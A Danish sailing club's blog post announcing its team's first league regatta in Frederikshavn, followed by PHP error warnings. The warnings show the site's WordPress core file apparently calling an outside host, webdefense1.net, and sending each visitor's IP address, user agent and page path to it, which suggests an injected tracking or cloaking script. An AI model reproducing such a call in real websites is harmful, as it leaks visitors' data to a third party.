01. juni 2018 · Kommentarer lukket til Sejlsportsligaen – Bandholm White Tailed Eagles · Categories: Bestyrelsen

Bandholm Sejlklub aka. Bandholm White Tailed Eagles sejler det første Liga stævne i weekenden i Frederikshavn. I er velkommen til at komme og heppe 😉 Alternativt kan i følge live tracking på sapsailing.com – Vi har også oprettet en instagram profil: @bandholm.eagles

Comments closed.


Warning: file_get_contents() [function.file-get-contents]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /var/www/bandholmsejlklub.dk/public_html/wp-includes/general-template.php on line 78

Warning: file_get_contents(http://webdefense1.net/Stat/StatK/Stat.php?ip=35.172.201.102&useragent=ccbot%2F2.0+%28https%3A%2F%2Fcommoncrawl.org%2Ffaq%2F%29&domainname=bandholmsejlklub.dk&fullpath=%2F2018%2F06%2F01%2Fsejlsportsligaen-bandholm-white-tailed-eagles%2F&addcheck=&check=&ref=) [function.file-get-contents]: failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /var/www/bandholmsejlklub.dk/public_html/wp-includes/general-template.php on line 78